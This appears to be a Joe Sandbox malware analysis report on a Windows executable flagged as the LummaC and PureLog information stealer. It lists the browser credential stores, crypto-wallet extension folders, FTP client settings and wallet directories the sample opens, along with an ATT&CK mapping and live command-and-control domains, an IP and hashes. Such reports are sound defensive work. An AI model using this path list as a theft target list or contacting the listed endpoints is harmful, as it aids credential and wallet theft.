Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents\JDSOXXXWOA	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents\JDSOXXXWOA	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents\UQMPCTZARJ	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents\UQMPCTZARJ	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents\IVHSHTCODI	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents\IVHSHTCODI	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents\JDSOXXXWOA	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents\JDSOXXXWOA	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents\UQMPCTZARJ	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Directory queried: C:\Users\user\Documents\UQMPCTZARJ	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: mWAik6b.exe, type: SAMPLE
Source: Yara match	File source: 0.0.mWAik6b.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.mWAik6b.exe.34a9550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.mWAik6b.exe.34a9550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2074383446.0000000000032000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	23 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	211 Process Injection	Security Account Manager	23 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
mWAik6b.exe	29%	Virustotal	Browse
mWAik6b.exe	32%	ReversingLabs
mWAik6b.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
jarry-deatile.bond	0%	Avira URL Cloud	safe
https://cultureddirtys.click/C	100%	Avira URL Cloud	malware
immolatechallen.bond	0%	Avira URL Cloud	safe
pain-temper.bond	0%	Avira URL Cloud	safe
https://cultureddirtys.click/w	100%	Avira URL Cloud	malware
stripedre-lot.bond	0%	Avira URL Cloud	safe
https://cultureddirtys.click/api	100%	Avira URL Cloud	malware
crookedfoshe.bond	0%	Avira URL Cloud	safe
https://cultureddirtys.click:443/apindows	100%	Avira URL Cloud	malware
jarry-fixxer.bond	0%	Avira URL Cloud	safe
growthselec.bond	0%	Avira URL Cloud	safe
cultureddirtys.click	100%	Avira URL Cloud	malware
https://cultureddirtys.click/	100%	Avira URL Cloud	malware
https://cultureddirtys.click:443/apiles	100%	Avira URL Cloud	malware
https://cultureddirtys.click/apiC	100%	Avira URL Cloud	malware
strivehelpeu.bond	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cultureddirtys.click	172.67.150.129	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
jarry-deatile.bond	true	Avira URL Cloud: safe	unknown
immolatechallen.bond	true	Avira URL Cloud: safe	unknown
stripedre-lot.bond	true	Avira URL Cloud: safe	unknown
jarry-fixxer.bond	true	Avira URL Cloud: safe	unknown
pain-temper.bond	true	Avira URL Cloud: safe	unknown
crookedfoshe.bond	true	Avira URL Cloud: safe	unknown
https://cultureddirtys.click/api	true	Avira URL Cloud: malware	unknown
growthselec.bond	true	Avira URL Cloud: safe	unknown
strivehelpeu.bond	true	Avira URL Cloud: safe	unknown
cultureddirtys.click	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://cultureddirtys.click/C	mWAik6b.exe, 00000002.00000002.2277537994.0000000001420000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cultureddirtys.click:443/apindows	mWAik6b.exe, 00000002.00000002.2277309695.00000000013BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.6.dr	false		high
https://cultureddirtys.click/w	mWAik6b.exe, 00000002.00000002.2277537994.0000000001420000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cultureddirtys.click/apiC	mWAik6b.exe, 00000002.00000002.2277309695.00000000013C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cultureddirtys.click:443/apiles	mWAik6b.exe, 00000002.00000002.2277309695.00000000013BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cultureddirtys.click/	mWAik6b.exe, 00000002.00000002.2277537994.0000000001420000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.150.129	cultureddirtys.click	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590828
Start date and time:	2025-01-14 16:14:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	mWAik6b.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 38 Number of non-executed functions: 109
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 40.126.32.68, 13.107.246.45, 20.109.210.53
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:15:09	API Interceptor	7x Sleep call for process: mWAik6b.exe modified
10:15:24	API Interceptor	1x Sleep call for process: WerFault.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://mercedesinsua.com.ar/?infox=Ymxha2Uuc2lyZ29AY290ZXJyYS5jb20=	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://secure.ezpassbgy.top/pay	Get hash	malicious	Unknown	Browse	104.21.15.205
	https://2ol.itectaxice.ru/Qm75/	Get hash	malicious	Unknown	Browse	104.17.25.14
	m68k.elf	Get hash	malicious	Unknown	Browse	172.68.102.177
	https://forms.office.com/e/xknrfCPQkR	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://bankersonline.emlnk1.com/lt.php?x=3DZy~GDKVXafEpOq0AE4hRad~XEkk_HzluhlXXTGVXjNDHz~_Uy.0eht1H_zk_D2kvY3bHHJJ3ab62	Get hash	malicious	Unknown	Browse	104.16.117.116
	https://forms.office.com/e/xknrfCPQkR	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://forms.office.com/e/xknrfCPQkR	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Employee_Salary_Update.docx	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://forms.office.com/e/xknrfCPQkR	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	lumma1.exe	Get hash	malicious	LummaC	Browse	172.67.150.129
	VRO.exe	Get hash	malicious	Unknown	Browse	172.67.150.129
	VRO.exe	Get hash	malicious	Unknown	Browse	172.67.150.129
	e0691gXIKs.exe	Get hash	malicious	Unknown	Browse	172.67.150.129
	Y4TyDwQzbE.exe	Get hash	malicious	Unknown	Browse	172.67.150.129
	DYv2ldz5xT.exe	Get hash	malicious	Unknown	Browse	172.67.150.129
	rBFTGm5ioO.exe	Get hash	malicious	Unknown	Browse	172.67.150.129
	DYv2ldz5xT.exe	Get hash	malicious	Unknown	Browse	172.67.150.129

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_mWAik6b.exe_a7fd83d59ed2df8d43c4fb3810d1dbe838887ce9_5e5638ff_9adb1ad0-0525-4e47-848b-7c5f41c29b2d\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8880884374839403
Encrypted:	false
SSDEEP:	96:JZFju2Jc7tsog0HjTOAqyS3QXIDcQlc6VcEdcw3F+BHUHZ0ownOgHkEwH3dEFYRP:n02c7tXeA0LR3Ua2GzuiFUZ24IO8N
MD5:	332D50B3FCC4F1B9E3614680C47C112F
SHA1:	4243F226F898D86F4585A18BAF8F5DC8E21E7AA5
SHA-256:	243771C27BC193A198B71D07715B38F8F6DFD8E6080F6C8082FE5F0990050870
SHA-512:	D7216A3F621105C81DED49AA1C406AC5F20336C34FB052B2CE84F84DBB2172963B9ED44A06E337ECF487FC6576D8369130C0604531A879BC3C7867F823191BA7
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.3.4.1.3.0.9.2.3.2.0.1.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.3.4.1.3.0.9.7.7.8.9.0.0.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.d.b.1.a.d.0.-.0.5.2.5.-.4.e.4.7.-.8.4.8.b.-.7.c.5.f.4.1.c.2.9.b.2.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.3.b.5.c.c.a.b.-.c.3.8.1.-.4.e.9.d.-.8.1.e.2.-.d.2.b.d.3.8.d.2.6.e.6.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.W.A.i.k.6.b...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.a.n.d.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.8.0.-.0.0.0.1.-.0.0.1.4.-.6.4.0.4.-.2.4.1.9.9.7.6.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.b.7.6.0.a.9.d.a.9.4.f.1.f.3.a.d.5.1.8.8.d.7.a.e.e.2.1.7.d.4.7.0.0.0.0.0.0.0.0.!.0.0.0.0.8.c.4.b.9.3.5.0.4.0.1.5.8.b.1.b.a.6.5.a.5.9.9.4.1.3.b.1.4.e.8.d.9.e.3.b.9.7.5.e.!.m.W.A.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4E41.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Jan 14 15:15:09 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	155381
Entropy (8bit):	3.7104953619325167
Encrypted:	false
SSDEEP:	1536:TVepN4uE2aODoLTg1A+XQCD6tT97hNuBojR3CC+H:Tm4uEqELTgl7k7rypH
MD5:	9EDF37002B03493CB43F99CF761987C5
SHA1:	1A8CCD70E04527F2EB69DB82065E305E44D5D926
SHA-256:	354A755903F2FCA731500C4A7699FD603AF05B4928BC334F69AA54FC730D43C9
SHA-512:	AB0760D23EFA9267013BA1C8E0D791B3DF0849D56B777AB1E99A6FEE30626332714BBA97047887911878B23C3D458DCBC4827424F3757A85470B5768D0DAF4A8
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......}..g....................................$................/..........`.......8...........T...........x$..}:......................................................................................................eJ......P.......GenuineIntel............T...........\|..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4F8B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8370
Entropy (8bit):	3.690313764003803
Encrypted:	false
SSDEEP:	192:R6l7wVeJPjr60P6YEIMSUvZ/gmfawVJNprB89biNsf52m:R6lXJ7r6U6YEDSUB/gmffVJ+iGfx
MD5:	201ECB0EA18F546D7DA356BE9CC33DE0
SHA1:	1456997D86962079DF8FFEFDF1F71C828898E683
SHA-256:	CEA131FE68DD8F008447D0688BC36B10C48DD042542CD0C9B893B3F1E1DD4594
SHA-512:	99D21190A231E72B9567A94A2867CA4C1177ED0833A8E3719F3F303DB59CE33BD0418FB87FA538F34D757F70E16810EF0BED1D7EDAC89CB23456203C92684434
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.9.4.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FAB.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4735
Entropy (8bit):	4.443859365705223
Encrypted:	false
SSDEEP:	48:cvIwWl8zsDJg77aI9nkWpW8VY/oYm8M4JodxPcf6Fuj+q8vodxPcfxQrYBd:uIjfdI7N97VUJZf5jKZfxQrYBd
MD5:	9A2FBEC6ADB9BCE93923310FC7889CC8
SHA1:	488E5B4E47A9C97879C10C836C824DBB431BF9D9
SHA-256:	832EEEFAC8B22CD8E9FDFADF28DE7DF204D9EEA9B11BAB7E8A31D7336B6B8798
SHA-512:	4A44DA541ED8C4262EA72D9B46B1DCEE63481C6523BC8116DA7808AE66B4059A0AC5E8A9CF0803A236A657977AF9A0457B987D58E3A506C50FE7A7759B4723D0
Malicious:	false
Reputation:	low
